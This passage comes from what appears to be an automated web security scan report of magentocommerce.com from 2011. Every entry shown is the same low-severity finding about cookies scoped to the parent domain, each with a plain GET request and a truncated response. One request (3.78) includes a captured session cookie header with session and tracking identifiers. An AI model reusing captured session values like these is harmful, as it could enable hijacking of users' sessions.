The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wander/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175967; expires=Sat, 11-Aug-2012 15:06:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fmedia%2Finterviews%2Fwander%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 40360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.76. http://www.magentocommerce.com/media/interviews/wearport/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wearport/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wearport/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175899; expires=Sat, 11-Aug-2012 15:04:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fwearport%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:59 GMT
Content-Length: 38889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.77. http://www.magentocommerce.com/media/interviews/wkf-communications/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wkf-communications/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews/wkf-communications/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175909; expires=Sat, 11-Aug-2012 15:05:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fwkf-communications%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:09 GMT
Content-Length: 39057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.78. http://www.magentocommerce.com/media/screencasts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/interviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170908; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171069; expires=Sat, 11-Aug-2012 13:44:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:29 GMT
Content-Length: 115374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.79. http://www.magentocommerce.com/media/screencasts/adding-related-products/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/adding-related-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.80. http://www.magentocommerce.com/media/screencasts/community-groups/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/community-groups/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176027; expires=Sat, 11-Aug-2012 15:07:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:07 GMT
Content-Length: 33275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.81. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/configuring-tier-pricing/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176151; expires=Sat, 11-Aug-2012 15:09:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:11 GMT
Content-Length: 34931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.82. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/content-staging-and-merging/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176016; expires=Sat, 11-Aug-2012 15:06:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:56 GMT
Content-Length: 33289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.83. http://www.magentocommerce.com/media/screencasts/currency/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/currency/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176054; expires=Sat, 11-Aug-2012 15:07:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:35 GMT
Content-Length: 34872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.84. http://www.magentocommerce.com/media/screencasts/data-exporting/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/data-exporting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176046; expires=Sat, 11-Aug-2012 15:07:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:26 GMT
Content-Length: 34645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.85. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/designers-guide-1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 37478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.86. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/gift-certificates-cards/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176002; expires=Sat, 11-Aug-2012 15:06:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:43 GMT
Content-Length: 33319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.87. http://www.magentocommerce.com/media/screencasts/grouped-products/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/grouped-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176154; expires=Sat, 11-Aug-2012 15:09:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:15 GMT
Content-Length: 33124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.88. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175988; expires=Sat, 11-Aug-2012 15:06:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:28 GMT
Content-Length: 33321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.89. http://www.magentocommerce.com/media/screencasts/landing-pages/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/landing-pages/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176057; expires=Sat, 11-Aug-2012 15:07:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:37 GMT
Content-Length: 36261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.90. http://www.magentocommerce.com/media/screencasts/permissions/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

